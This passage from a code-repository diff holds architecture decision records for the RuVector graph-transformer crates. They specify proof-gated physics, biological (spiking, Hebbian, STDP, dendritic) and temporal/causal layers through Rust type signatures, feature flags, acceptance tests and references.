The existing `ruvector-attention/src/pde_attention/diffusion.rs` provides diffusion on graphs. The `physics` module wraps this with conservation proofs:
```rust
/// PDE attention with mass conservation proof.
///
/// Bridges to ruvector_attention::pde_attention::DiffusionAttention.
/// After each diffusion step, proves total mass is conserved:
/// sum_i h_i(t+dt) == sum_i h_i(t) within tolerance.
pub struct ConservativePdeAttention {
diffusion: DiffusionAttention,
mass_tolerance: f64,
}
```
### Feature Flag
```toml
# In crates/ruvector-graph-transformer/Cargo.toml
[features]
physics = [
"ruvector-mincut-gated-transformer/energy_gate",
"ruvector-attention/pde_attention",
"ruvector-attention/sheaf",
"ruvector-attention/transport",
]
```
## Consequences
### Positive
- Energy conservation is guaranteed by construction via symplectic integration and formally verified per step
- Gauge invariance from sheaf attention ensures predictions are coordinate-independent
- PDE attention with mass conservation proof prevents unphysical feature drift
- Physics priors reduce required training data by encoding known laws, with estimated 100x improvement for molecular dynamics tasks
- All layers compose with the proof-gated mutation protocol (ADR-047), producing auditable attestation chains
### Negative
- Leapfrog integration adds O(num_steps) overhead per layer compared to a standard residual connection
- Yang-Mills regularization requires computing holonomies around plaquettes (small graph cycles), which is O(triangles) per forward pass
- `LagrangianAttention` requires Newton iteration to solve the implicit discrete Euler-Lagrange equation (5 iterations by default)
- Users must supply phase-space representations (q, p) rather than generic node features
### Risks
- If energy tolerance is set too tight, Reflex-tier proofs will fail and escalate to Standard/Deep, exceeding the 2% overhead budget (ADR-047). Mitigation: default tolerance of 1e-4 relative drift, which is achievable with double-precision leapfrog
- Sheaf restriction maps as gauge connections assume orthogonal gauge group. Extending to non-abelian groups (SU(2), SU(3)) requires operator ordering care and is deferred to a follow-up ADR
- Noether symmetry mining (automatic conservation law discovery) is not included in this ADR due to training cost; it is an extension for ADR-049's verified training pipeline
## Implementation
1. Create `crates/ruvector-graph-transformer/src/physics/mod.rs` re-exporting all layer types
2. Implement `HamiltonianGraphNet` in `physics/hamiltonian.rs`, bridging to `ruvector-mincut-gated-transformer::energy_gate`
3. Implement `GaugeEquivariantMP` in `physics/gauge.rs`, bridging to `ruvector-attention::sheaf::{SheafAttention, RestrictionMap}`
4. Implement `LagrangianAttention` in `physics/lagrangian.rs`, bridging to `ruvector-attention::transport::SlicedWassersteinAttention`
5. Implement `ConservativePdeAttention` in `physics/pde.rs`, bridging to `ruvector-attention::pde_attention::DiffusionAttention`
6. Add benchmark: `benches/physics_bench.rs` measuring energy drift over 10,000 leapfrog steps on a 1,000-node molecular graph
7. Integration test: compose `HamiltonianGraphNet` + `GaugeEquivariantMP` in a full forward pass, verify attestation chain integrity
8. Verify build: `cargo test --features physics -p ruvector-graph-transformer`
## References
- ADR-046: Graph Transformer Unified Architecture (module structure, `AttentionRegistry`)
- ADR-047: Proof-Gated Mutation Protocol (`ProofGate<T>`, `ProofRequirement`, three-tier routing)
- ADR-049: Verified Training Pipeline (conservation law invariants during training)
- Research: `docs/research/gnn-v2/22-physics-informed-graph-transformers.md`
- `crates/ruvector-mincut-gated-transformer/src/energy_gate.rs`: `EnergyGate`, `EnergyGateConfig`
- `crates/ruvector-attention/src/sheaf/restriction.rs`: `RestrictionMap`
- `crates/ruvector-attention/src/sheaf/attention.rs`: `SheafAttention`, `SheafAttentionConfig`
- `crates/ruvector-attention/src/transport/sliced_wasserstein.rs`: `SlicedWassersteinAttention`
- `crates/ruvector-attention/src/pde_attention/diffusion.rs`: `DiffusionAttention`
- `crates/ruvector-attention/src/pde_attention/laplacian.rs`: graph Laplacian
- `crates/ruvector-attention/src/curvature/fused_attention.rs`: `MixedCurvatureFusedAttention`
- `crates/ruvector-verified/src/gated.rs`: `ProofTier`, `route_proof`, `verify_tiered`
- `crates/ruvector-verified/src/proof_store.rs`: `ProofAttestation`, 82-byte witnesses
- Greydanus et al., "Hamiltonian Neural Networks" (arXiv:1906.01563, 2019)
- Cranmer et al., "Lagrangian Neural Networks" (arXiv:2003.04630, 2020)
- Cohen et al., "Gauge Equivariant Convolutional Networks" (arXiv:1902.04615, 2019)
- Hansen & Gebhart, "Sheaf Neural Networks" (arXiv:2012.06333, 2020)

View File

@@ -0,0 +1,452 @@
# ADR-052: Biological Graph Transformer Layers
## Status
Accepted
## Date
2026-02-25
## Context
Biological neural networks process graph-structured information at 20 watts while consuming 86 billion neurons and 100 trillion synapses. Artificial graph transformers processing comparable graphs require megawatts. This disparity stems from three computational principles that artificial graph transformers have not adopted: event-driven sparsity (99%+ of compute is skipped when neurons are below threshold), local learning rules (synaptic updates require only pre/post-synaptic activity, no global backpropagation), and temporal coding (precise spike timing carries information beyond firing rates).
RuVector already implements the core biological primitives across several crates:
- `ruvector-mincut-gated-transformer/src/attention/spike_driven.rs`: `SpikeDrivenAttention` with multiplication-free attention via spike coincidence detection
- `ruvector-mincut-gated-transformer/src/spike.rs`: `SpikeScheduler` with rate-based tier selection and novelty gating
- `ruvector-nervous-system/src/dendrite/compartment.rs`: multi-compartment dendritic models
- `ruvector-nervous-system/src/dendrite/coincidence.rs`: dendritic coincidence detection
- `ruvector-nervous-system/src/dendrite/plateau.rs`: plateau potential generation for BTSP
- `ruvector-nervous-system/src/plasticity/btsp.rs`: Behavioral Timescale Synaptic Plasticity
- `ruvector-nervous-system/src/plasticity/eprop.rs`: e-prop eligibility trace learning
- `ruvector-nervous-system/src/plasticity/consolidate.rs`: synaptic consolidation
- `ruvector-nervous-system/src/hopfield/network.rs`: modern Hopfield network as associative memory
- `ruvector-gnn/src/ewc.rs`: `ElasticWeightConsolidation` for continual learning
- `ruvector-gnn/src/replay.rs`: `ReplayBuffer` for experience replay
However, there is no composition layer that integrates these primitives into graph transformer layers with proof-gated stability guarantees. The research at `docs/research/gnn-v2/23-biological-graph-transformers.md` describes the theoretical roadmap but does not map onto existing crate APIs or the proof-gated mutation protocol.
## Decision
We will implement a `biological` module in `ruvector-graph-transformer` behind the `biological` feature flag. The module provides four layer types: `SpikingGraphAttention`, `HebbianLayer`, `DendriticAttention`, and `StdpEdgeUpdater`, each integrated with proof-gated stability bounds.
### SpikingGraphAttention
Composes spike-driven attention with graph topology:
```rust
/// Spiking graph attention with edge-constrained spike propagation.
///
/// Bridges ruvector-mincut-gated-transformer::attention::spike_driven
/// with graph adjacency to route spikes only along edges.
/// Proof gate: membrane potential stability (spectral radius < 1.0).
pub struct SpikingGraphAttention {
/// Spike-driven attention from ruvector-mincut-gated-transformer.
spike_attn: SpikeDrivenAttention,
/// Per-node membrane potentials (LIF model).
membrane: Vec<f32>,
/// Per-node refractory counters.
refractory: Vec<u8>,
/// Per-edge synaptic delays (in timesteps).
edge_delays: Vec<u8>,
/// Membrane decay constant (must be < 1.0 for stability).
decay: f32,
/// Spike threshold.
threshold: f32,
/// Proof requirement: spectral radius of effective operator < 1.0.
stability_proof: ProofRequirement,
/// Inhibition strategy for preventing synchrony collapse.
inhibition: InhibitionStrategy,
}
/// The effective operator whose spectral radius is bounded.
///
/// The proof does not bound the raw weight matrix. It bounds the
/// effective operator: A_eff = diag(decay) * (W_adj ⊙ W_attn).
/// Power iteration estimates rho(A_eff) with variance; the proof
/// attests to: rho_estimated + safety_margin < 1.0, where
/// safety_margin = 3 * stddev(rho) over `num_iterations` runs.
///
/// ProofClass: Statistical { iterations: num_iterations, tolerance: safety_margin }.
pub struct EffectiveOperator {
/// Number of power iteration rounds for spectral radius estimation.
pub num_iterations: usize,
/// Safety margin above estimated rho (3-sigma conservative).
pub safety_margin: f32,
/// Whether to use layerwise bounds (cheaper, tighter for block-diagonal).
pub layerwise: bool,
}
/// Inhibition strategy for dense graphs where synchrony is a safety risk.
///
/// Inhibitory dynamics are CORE, not optional. Synchrony collapse on
/// dense graphs (degree > 100) is not a feature regression — it is a
/// safety failure. Without inhibition, proof-gated stability (rho < 1.0)
/// can still permit correlated firing that violates the independence
/// assumption in the spectral bound.
pub enum InhibitionStrategy {
/// Winner-take-all: top-k nodes fire, rest are suppressed.
/// From ruvector-nervous-system::compete::inhibition::WTA.
WinnerTakeAll { k: usize },
/// Lateral inhibition: each firing node suppresses neighbors
/// with strength proportional to edge weight.
/// From ruvector-nervous-system::compete::inhibition::Lateral.
Lateral { strength: f32 },
/// Balanced excitation/inhibition: maintain E/I ratio within bounds.
/// Dale's law: each node is either excitatory or inhibitory, not both.
BalancedEI { ei_ratio: f32, dale_law: bool },
}
impl SpikingGraphAttention {
/// Process one timestep of spiking graph attention.
///
/// Spikes propagate only along graph edges with per-edge delays.
/// LIF membrane dynamics: V(t+1) = decay * V(t) + I_syn(t).
/// Fires when V > threshold, then resets to 0.
///
/// Proof gate verifies spectral radius of the effective operator
/// A_eff = diag(decay) * (W_adj ⊙ W_attn) is below 1.0 to
/// prevent runaway excitation. The bound is conservative:
/// rho_estimated + 3*sigma < 1.0 (see EffectiveOperator).
/// Routes to ProofTier::Standard(500) with ProofClass::Statistical.
/// After step: inhibition is applied (core, not optional).
pub fn step(
&mut self,
input_spikes: &[bool],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<SpikeOutput>>;
/// Compute current firing rate per node (exponential moving average).
pub fn firing_rates(&self) -> &[f32];
}
```
### HebbianLayer with EWC Protection
Local learning rules with catastrophic forgetting prevention:
```rust
/// Hebbian learning layer with Oja/BCM rules.
///
/// Weight updates are purely local: delta_w_ij = eta * f(x_i, y_j, w_ij).
/// Bridges to ruvector-gnn::ewc::ElasticWeightConsolidation to prevent
/// catastrophic forgetting when the graph evolves.
///
/// Proof gate: weight update must not increase Fisher-weighted
/// distance from consolidated parameters beyond a bound.
///
/// Constitutional rule: NO weight update proceeds without consuming
/// a ProofGate<HebbianUpdateResult>. The update method returns a
/// ProofGate, and the caller must unlock it to apply the weights.
/// This is not advisory — it is a type-level enforcement.
pub struct HebbianLayer {
/// Learning rule variant.
rule: HebbianRule,
/// Learning rate.
eta: f32,
/// EWC from ruvector-gnn for consolidation.
ewc: Option<ElasticWeightConsolidation>,
/// Proof requirement: weight stability bound.
stability_proof: ProofRequirement,
/// Norm bound specification for EWC distance metric.
norm_bound: HebbianNormBound,
}
/// Specifies how the Fisher-weighted norm bound is computed.
///
/// The bound ||w_new - w_consolidated||_F < threshold uses the
/// diagonal Fisher approximation (full Fisher is O(n^2) and
/// infeasible for large graphs). Layerwise bounds are tighter
/// than a single global bound because they exploit block-diagonal
/// structure.
pub struct HebbianNormBound {
/// Maximum Fisher-weighted distance from consolidated weights.
pub threshold: f32,
/// Use diagonal Fisher approximation (always true in practice).
pub diagonal_fisher: bool,
/// Compute bounds per-layer rather than globally.
/// Tighter but slightly more expensive (one norm per layer vs one total).
pub layerwise: bool,
/// ProofClass for this bound.
/// Formal if diagonal Fisher is exact; Statistical if sampled.
pub proof_class: ProofClass,
}
pub enum HebbianRule {
/// Oja's rule: delta_w = eta * y * (x - w * y).
/// Converges to first principal component.
Oja,
/// BCM rule: delta_w = eta * y * (y - theta_m) * x.
/// theta_m is a sliding threshold (metaplasticity).
BCM { theta_init: f32 },
/// STDP: delta_w depends on spike timing (pre/post).
/// Delegates to StdpEdgeUpdater.
STDP { a_plus: f32, a_minus: f32, tau: f32 },
}
impl HebbianLayer {
/// Apply one Hebbian weight update step.
///
/// When EWC is active, the update is modified:
/// delta_w_ij = eta * hebb(x_i, y_j) - lambda * F_ij * (w_ij - w*_ij)
/// where F_ij is the Fisher information and w*_ij are consolidated weights.
///
/// Proof gate: verifies ||w_new - w_consolidated||_F < bound
/// where ||.||_F is the diagonal Fisher-weighted norm, computed
/// layerwise when `norm_bound.layerwise` is true.
///
/// Constitutional rule: the returned ProofGate<HebbianUpdateResult>
/// must be unlocked before weights are committed. There is no
/// code path that writes weights without a satisfied gate.
///
/// Routes to ProofTier::Standard (norm computation, < 1 us).
pub fn update(
&mut self,
pre_activations: &[f32],
post_activations: &[f32],
weights: &mut [f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<HebbianUpdateResult>>;
/// Consolidate current weights into EWC anchor.
/// Called at task boundaries during continual learning.
pub fn consolidate(&mut self, weights: &[f32]);
}
```
### DendriticAttention
Multi-compartment dendritic computation as attention:
```rust
/// Dendritic attention using compartment models.
///
/// Each graph node is modeled as a multi-compartment neuron
/// (from ruvector-nervous-system::dendrite). Different dendritic
/// branches attend to different subsets of graph neighbors,
/// enabling multiplicative gating without explicit gating networks.
///
/// Bridges to:
/// - ruvector_nervous_system::dendrite::compartment::Compartment
/// - ruvector_nervous_system::dendrite::coincidence::CoincidenceDetector
/// - ruvector_nervous_system::dendrite::plateau::PlateauGenerator
pub struct DendriticAttention {
/// Number of dendritic branches per node.
num_branches: usize,
/// Compartment model parameters.
compartment_config: CompartmentConfig,
/// Branch-to-neighbor assignment (learned or heuristic).
branch_assignment: BranchAssignment,
/// Plateau potential threshold for nonlinear dendritic events.
plateau_threshold: f32,
}
pub enum BranchAssignment {
/// Assign neighbors to branches round-robin by degree.
RoundRobin,
/// Cluster neighbors by feature similarity, one branch per cluster.
FeatureClustered { num_clusters: usize },
/// Learned assignment via attention routing.
Learned,
}
impl DendriticAttention {
/// Forward pass: route neighbor messages to dendritic branches,
/// compute compartment dynamics, trigger plateau potentials.
///
/// The output is the soma (cell body) voltage after dendritic
/// integration. Plateau potentials provide nonlinear amplification
/// of coincident inputs on the same branch.
pub fn forward(
&self,
features: &[f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<DendriticOutput>>;
}
```
### StdpEdgeUpdater
STDP-driven graph rewiring with proof-gated stability:
```rust
/// STDP edge update with two proof-gated tiers:
///
/// 1. **Weight updates** (Standard tier): Causal spike timing
/// potentiates edges; anti-causal timing depresses edges.
/// Stability certificate proves rho(A_eff) < 1.0.
///
/// 2. **Topology changes** (Deep tier): When edge weight drops
/// below `prune_threshold`, the edge is removed. When a node
/// pair has sustained high co-firing rate, a new edge is added.
/// Topology changes require Deep tier proof because they alter
/// the graph Laplacian and can invalidate partition boundaries.
///
/// Both operations return ProofGate. Topology changes are strictly
/// more expensive and are batched per epoch, not per timestep.
pub struct StdpEdgeUpdater {
a_plus: f32,
a_minus: f32,
tau_plus: f32,
tau_minus: f32,
/// Last spike time per node (for timing computation).
last_spike: Vec<f64>,
/// Weight bounds [min, max] to prevent degenerate solutions.
weight_bounds: (f32, f32),
/// Threshold below which edges are pruned (topology change).
prune_threshold: f32,
/// Co-firing threshold above which new edges are created.
growth_threshold: f32,
/// Maximum edges that can be added per epoch (budget).
max_new_edges_per_epoch: usize,
}
impl StdpEdgeUpdater {
/// Update edge weights based on recent spike history.
/// Weight-only: does not change graph topology.
///
/// Routes to ProofTier::Standard(500).
/// Returns ProofGate<StdpWeightResult> with stability certificate.
pub fn update_weights(
&mut self,
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<StdpWeightResult>>;
/// Rewire graph topology based on accumulated STDP statistics.
/// Prunes weak edges, grows edges between co-firing pairs.
///
/// Routes to ProofTier::Deep because topology changes affect:
/// - Min-cut partition boundaries (ProofScope invalidation)
/// - Graph Laplacian eigenvalues (spectral sparsification)
/// - Attestation chain (ScopeTransitionAttestation required)
///
/// Returns ProofGate<StdpTopologyResult> with:
/// - edges_pruned, edges_added counts
/// - new spectral radius bound
/// - ScopeTransitionAttestation if partitions changed
pub fn rewire_topology(
&mut self,
graph: &mut impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<StdpTopologyResult>>;
}
```
### Proof-Gated Plasticity Protocol
All weight update mechanisms (Hebbian, STDP, dendritic plateau) are gated through the proof system:
| Update Type | Proof Requirement | Tier | Latency | ProofClass |
|-------------|------------------|------|---------|------------|
| Oja/BCM weight step | Fisher-weighted norm bound (diagonal, layerwise) | Standard(200) | < 1 us | Formal (diagonal exact) or Statistical (sampled Fisher) |
| STDP weight update | rho(A_eff) + 3σ < 1.0 | Standard(500) | < 5 us | Statistical { iterations, safety_margin } |
| STDP topology rewire | Laplacian + partition integrity | Deep | < 100 us | Formal (exact edge count) + Statistical (spectral bound) |
| Plateau potential | Membrane stability bound | Reflex | < 10 ns | Formal |
| EWC consolidation | Fisher diagonal computation | Deep | < 100 us | Formal |
| Inhibition enforcement | E/I ratio within bounds | Reflex | < 10 ns | Formal |
### Feature Flag
```toml
# In crates/ruvector-graph-transformer/Cargo.toml
[features]
biological = [
"ruvector-mincut-gated-transformer/spike_attention",
"ruvector-gnn",
]
```
The `ruvector-nervous-system` dependency is optional and gated behind a sub-feature `biological-dendritic`:
```toml
biological-dendritic = ["biological", "ruvector-nervous-system"]
```
## Consequences
### Positive
- Event-driven spiking attention skips 99%+ of node computations, enabling significant energy reduction for sparse graph workloads (the exact factor is hardware-dependent: 87x is measured on neuromorphic hardware with native spike support; on von Neumann architectures the reduction is lower due to memory access patterns)
- Local Hebbian learning eliminates global backpropagation dependency, enabling truly distributed graph learning
- EWC integration prevents catastrophic forgetting during continual graph learning
- Dendritic attention provides multiplicative gating without explicit gating parameters
- Proof-gated stability (spectral radius < 1.0) prevents runaway excitation cascades
- STDP self-organizes edge weights based on temporal structure, pruning redundant connections
### Negative
- Spiking models require choosing a simulation timestep, adding a hyperparameter not present in standard graph transformers
- Hebbian rules converge to principal components, which may not align with downstream task objectives; requires hybrid training (Hebbian pre-training + fine-tuning)
- DendriticAttention introduces per-node compartment state, increasing memory by `num_branches * compartment_dim` per node
- Spectral radius estimation via power iteration has variance; the `EffectiveOperator` uses a conservative 3-sigma bound (rho_est + 3σ < 1.0) with configurable iteration count. If variance is too high (σ > 0.05), the proof gate rejects and forces a re-estimation with more iterations
### Risks
- Spiking graph attention on dense graphs (degree > 100) may produce pathological synchronization (all nodes fire simultaneously). Mitigation: `InhibitionStrategy` is CORE, not optional — synchrony collapse is a safety failure. The `BalancedEI` variant enforces Dale's law and maintains E/I ratio within proven bounds. Refractory periods provide the first line of defense; inhibition provides the structural guarantee
- BCM metaplasticity threshold drift can cause learning shutdown if the graph distribution shifts. Mitigation: periodic threshold reset via EWC anchor points
- Neuromorphic hardware mapping (Loihi 2 core allocation mentioned in the research doc) is out of scope for this ADR; it requires hardware-specific compilation not available in the Rust toolchain today
### Design Decisions
**Q: Are inhibitory dynamics core or an optional module?**
Core. Synchrony collapse on dense graphs is a safety failure, not a feature regression. Without inhibition, the spectral radius bound can be satisfied (rho < 1.0) while correlated firing still violates the independence assumption in the bound. `InhibitionStrategy` is a required field on `SpikingGraphAttention`, not an optional module behind a feature flag. The `BalancedEI` variant is the recommended default for graphs with mean degree > 50.
**Q: Does STDP rewiring change topology or weights only?**
Both, at different proof tiers. Weight updates are Standard tier (frequent, cheap, per-timestep). Topology changes (edge pruning and growth) are Deep tier (expensive, batched per epoch). This separation exists because topology changes invalidate min-cut partitions and require `ScopeTransitionAttestation`, while weight changes within a fixed topology preserve partition boundaries. The `StdpEdgeUpdater` exposes `update_weights()` and `rewire_topology()` as separate methods with different proof gates.
### Missing Layer: BTSP and e-prop
This ADR does not yet define a `BtspLayer` or `EpropLayer` as first-class graph transformer components. The primitives exist in `ruvector-nervous-system::plasticity::{btsp, eprop}` and should be composed into graph transformer layers in a follow-up ADR. The key integration question is how eligibility traces (e-prop) interact with the proof-gated mutation protocol — each trace update is a stateful mutation that should carry a lightweight Reflex-tier proof.
### Acceptance Tests
1. `test_synchrony_invariant`: Create a fully connected 200-node spiking graph. Run 1000 timesteps without inhibition — verify synchrony collapse (>90% simultaneous firing). Enable `BalancedEI` inhibition — verify firing rate stays below 20% per timestep. The proof gate must reject any step where E/I ratio exceeds bounds.
2. `test_hebbian_constitutional_rule`: Attempt to apply Hebbian weight update without unlocking the ProofGate. Verify compile-time enforcement (the weight buffer is only accessible via `ProofGate::unlock()`). At runtime, verify that a HebbianLayer with `norm_bound.threshold = 0.001` rejects a large learning rate step.
3. `test_stdp_topology_tier_separation`: Run STDP on a 500-node graph for 100 timesteps. Verify all weight updates route to Standard tier. Trigger topology rewire (edge pruning). Verify it routes to Deep tier and produces `ScopeTransitionAttestation`. Verify total attestation chain length matches expected (100 Standard + 1 Deep).
4. `test_spectral_radius_conservative_bound`: Construct a weight matrix with known spectral radius 0.95. Run `EffectiveOperator` estimation with 20 iterations. Verify the estimated bound + 3σ < 1.0. Reduce `safety_margin` to 0.001 — verify the proof gate rejects (too tight).
## Implementation
1. Create `crates/ruvector-graph-transformer/src/biological/mod.rs` re-exporting all types including `EffectiveOperator`, `InhibitionStrategy`, `HebbianNormBound`
2. Implement `SpikingGraphAttention` in `biological/spiking.rs`, bridging to `ruvector-mincut-gated-transformer::attention::spike_driven`, with mandatory `InhibitionStrategy` and `EffectiveOperator`
3. Implement `HebbianLayer` in `biological/hebbian.rs`, bridging to `ruvector-gnn::ewc::ElasticWeightConsolidation`, with `HebbianNormBound` (diagonal Fisher, layerwise)
4. Implement `StdpEdgeUpdater` in `biological/stdp.rs` with two-tier proof gates: `update_weights()` at Standard, `rewire_topology()` at Deep
5. Implement `DendriticAttention` in `biological/dendritic.rs`, bridging to `ruvector-nervous-system::dendrite::{compartment, coincidence, plateau}`
6. Add benchmark: `benches/biological_bench.rs` measuring spike throughput on a 10,000-node graph over 1,000 timesteps, with and without inhibition
7. Integration test: spiking graph attention + STDP update loop for 100 steps, verify stability attestation chain including tier distribution
8. Run acceptance tests 1-4 defined above
9. Verify build: `cargo test --features biological -p ruvector-graph-transformer`
## References
- ADR-046: Graph Transformer Unified Architecture (module structure, feature flags)
- ADR-047: Proof-Gated Mutation Protocol (`ProofGate<T>`, `ProofRequirement`, spectral radius invariants)
- ADR-049: Verified Training Pipeline (per-step invariant verification, `LipschitzBound`)
- Research: `docs/research/gnn-v2/23-biological-graph-transformers.md`
- `crates/ruvector-mincut-gated-transformer/src/attention/spike_driven.rs`: `SpikeDrivenAttention`
- `crates/ruvector-mincut-gated-transformer/src/spike.rs`: `SpikeScheduler`, novelty gating
- `crates/ruvector-nervous-system/src/dendrite/compartment.rs`: `Compartment` model
- `crates/ruvector-nervous-system/src/dendrite/coincidence.rs`: `CoincidenceDetector`
- `crates/ruvector-nervous-system/src/dendrite/plateau.rs`: `PlateauGenerator`
- `crates/ruvector-nervous-system/src/plasticity/btsp.rs`: BTSP with eligibility traces
- `crates/ruvector-nervous-system/src/plasticity/eprop.rs`: e-prop learning
- `crates/ruvector-nervous-system/src/plasticity/consolidate.rs`: synaptic consolidation
- `crates/ruvector-nervous-system/src/compete/inhibition.rs`: lateral inhibition
- `crates/ruvector-gnn/src/ewc.rs`: `ElasticWeightConsolidation`
- `crates/ruvector-gnn/src/replay.rs`: `ReplayBuffer`, `ReplayEntry`
- `crates/ruvector-verified/src/gated.rs`: `ProofTier`, `route_proof`, `ProofClass`
- `crates/ruvector-nervous-system/src/compete/inhibition.rs`: `WTA`, `Lateral`, `BalancedEI`
- Bellec et al., "A solution to the learning dilemma for recurrent networks of spiking neurons" (Nature Comms, 2020) -- e-prop
- Bittner et al., "Behavioral time scale synaptic plasticity" (Neuron, 2017)
- Oja, "Simplified neuron model as a principal component analyzer" (J Math Bio, 1982)

View File

@@ -0,0 +1,342 @@
# ADR-053: Temporal and Causal Graph Transformer Layers
## Status
Accepted
## Date
2026-02-25
## Context
Most real-world graphs evolve over time: social networks rewire daily, financial transaction graphs stream continuously, biological interaction networks change with cellular state. Standard graph transformers treat the graph as a static snapshot, computing attention over a fixed adjacency matrix. This causes stale representations, causal confusion (future events leaking into past representations), and missing dynamics (temporal patterns carry signal that static embeddings cannot capture).
RuVector has extensive infrastructure for temporal and causal graph processing:
- `ruvector-dag/src/attention/causal_cone.rs`: `CausalConeAttention` focusing on ancestors with temporal discount
- `ruvector-dag/src/attention/temporal_btsp.rs`: Behavioral Timescale Synaptic Plasticity attention with eligibility traces
- `ruvector-dag/src/attention/topological.rs`: topological attention respecting DAG structure
- `ruvector-dag/src/dag/traversal.rs`: DAG traversal, topological sort, ancestor/descendant queries
- `ruvector-dag/src/dag/query_dag.rs`: query DAG construction
- `ruvector-temporal-tensor/src/delta.rs`: `DeltaChain` for sparse temporal compression
- `ruvector-temporal-tensor/src/tier_policy.rs`: hot/warm/cold tiered storage policies
- `ruvector-temporal-tensor/src/tiering.rs`: tiered tensor storage implementation
- `ruvector-attention/src/hyperbolic/lorentz_cascade.rs`: `LorentzCascadeAttention` with Busemann scoring (Lorentz metric is spacetime metric)
- `ruvector-graph/`: property graph with temporal metadata, Cypher queries
However, there is no composition layer that enforces causal ordering through the proof system, provides continuous-time ODE dynamics on graphs, or extracts Granger causality from attention weights with structural certificates. The research at `docs/research/gnn-v2/28-temporal-causal-graph-transformers.md` describes the theory but provides no integration path with the proof-gated mutation protocol.
## Decision
We will implement a `temporal` module in `ruvector-graph-transformer` behind the `temporal` feature flag. The module provides causal graph attention with proof-gated temporal ordering, retrocausal safety enforcement, continuous-time neural ODE on graphs, Granger causality extraction, and delta chain integration for temporal compression.
### CausalGraphTransformer
Causal masking with proof-gated temporal ordering:
```rust
/// Causal graph transformer with proof-gated temporal mutations.
///
/// Every temporal mutation must prove that its timestamp is strictly
/// greater than all predecessor timestamps in the causal cone.
/// Bridges to ruvector-dag::attention::causal_cone::CausalConeAttention.
pub struct CausalGraphTransformer {
/// Causal cone attention from ruvector-dag.
causal_attention: CausalConeAttention,
/// Mask strategy: Strict, TimeWindow, or Topological.
mask_strategy: MaskStrategy,
/// Temporal discount factor for ancestor weighting.
discount: f32,
/// Whether retrocausal (bidirectional) mode is permitted.
allow_retrocausal: bool,
/// Proof requirement: causal ordering.
causal_proof: ProofRequirement,
}
pub enum MaskStrategy {
/// Strict: only ancestors in the DAG may attend.
Strict,
/// TimeWindow: ancestors within a fixed time window.
TimeWindow { window_size: f64 },
/// Topological: attention follows topological ordering.
Topological,
}
impl CausalGraphTransformer {
/// Causal forward pass.
///
/// For each node v at time t, computes attention only over
/// nodes u with timestamp t_u <= t. The causal ordering is
/// verified via proof gate:
///
/// ProofRequirement::InvariantPreserved {
/// invariant_id: CAUSAL_ORDERING_INVARIANT,
/// }
///
/// Routes to ProofTier::Reflex for timestamp comparisons (< 10 ns)
/// since these are scalar comparisons.
pub fn forward(
&self,
features: &[f32],
timestamps: &[f64],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<TemporalOutput>>;
/// Interventional query: compute P(h_v(t) | do(h_u(t') = x)).
///
/// Severs incoming edges to the intervened node and propagates
/// the intervention downstream through the causal graph.
/// Uses ruvector-dag::dag::traversal for descendant computation.
pub fn intervene(
&self,
target_node: NodeId,
target_time: f64,
intervention_value: &[f32],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<InterventionResult>>;
}
```
### Retrocausal Safety
Bidirectional temporal attention is only permitted in offline/batch mode:
```rust
/// Retrocausal attention with strict safety enforcement.
///
/// Forward (causal) pass: h_v^->(t) uses only events at t' <= t.
/// Backward (retrocausal) pass: h_v^<-(t) uses only events at t' >= t.
/// Smoothed: h_v(t) = gate(h_v^->(t), h_v^<-(t)).
///
/// The retrocausal pass is ONLY invoked when `mode == TemporalMode::Batch`.
/// In online/streaming mode, the proof gate REJECTS any attempt to
/// access future timestamps. This is enforced at the type level:
/// `RetrocausalAttention::forward` requires `&BatchModeToken`, which
/// can only be constructed when the full temporal window is available.
pub struct RetrocausalAttention {
forward_attention: CausalConeAttention,
backward_attention: CausalConeAttention,
gate: LearnedGate,
}
/// Token proving batch mode is active. Cannot be constructed in streaming mode.
pub struct BatchModeToken { _private: () }
impl RetrocausalAttention {
/// Bidirectional smoothed attention. Requires batch mode proof.
pub fn forward(
&self,
features: &[f32],
timestamps: &[f64],
graph: &impl GraphRepr,
batch_token: &BatchModeToken,
env: &mut ProofEnvironment,
) -> Result<ProofGate<SmoothedOutput>>;
}
```
### ContinuousTimeODE
Neural ODE on graphs with adaptive integration:
```rust
/// Continuous-time graph network via neural ODE.
///
/// dh_v(t)/dt = f_theta(h_v(t), {h_u(t) : u in N(v, t)}, t)
///
/// Uses adaptive Dormand-Prince (RK45) integration with proof-gated
/// error control. The error tolerance proof ensures the local
/// truncation error stays below a configurable bound.
pub struct ContinuousTimeODE {
/// Hidden dimension.
dim: usize,
/// ODE solver tolerance (absolute).
atol: f64,
/// ODE solver tolerance (relative).
rtol: f64,
/// Maximum integration steps (prevents infinite loops).
max_steps: usize,
/// Proof requirement: integration error bound.
error_proof: ProofRequirement,
}
impl ContinuousTimeODE {
/// Integrate node embeddings from t_start to t_end.
///
/// The neighborhood N(v, t) changes as edges appear/disappear.
/// Edge events between t_start and t_end are processed in order.
/// Proof gate verifies local truncation error at each adaptive step
/// via ProofTier::Standard (error norm computation).
pub fn integrate(
&self,
features: &mut [f32],
t_start: f64,
t_end: f64,
edge_events: &[TemporalEdgeEvent],
graph: &impl GraphRepr,
env: &mut ProofEnvironment,
) -> Result<ProofGate<OdeOutput>>;
}
pub struct TemporalEdgeEvent {
pub source: NodeId,
pub target: NodeId,
pub timestamp: f64,
pub event_type: EdgeEventType,
}
pub enum EdgeEventType {
Add,
Remove,
UpdateWeight(f32),
}
```
### Granger Causality Extraction
Extract causal structure from learned attention weights:
```rust
/// Granger causality extraction from temporal attention weights.
///
/// Computes time-averaged attention weights and thresholds them
/// to produce a Granger-causal DAG. The DAG is stored in
/// ruvector-dag format for efficient traversal and querying.
///
/// A structural certificate attests that the extracted graph is
/// acyclic (a valid DAG) and that edge weights exceed the
/// significance threshold.
pub struct GrangerCausalityExtractor {
/// Significance threshold for edge inclusion.
threshold: f64,
/// Minimum time window for averaging attention weights.
min_window: usize,
}
impl GrangerCausalityExtractor {
/// Extract Granger-causal graph from temporal attention history.
///
/// Returns a DAG with edge weights = time-averaged attention.
/// The proof gate certifies acyclicity via topological sort
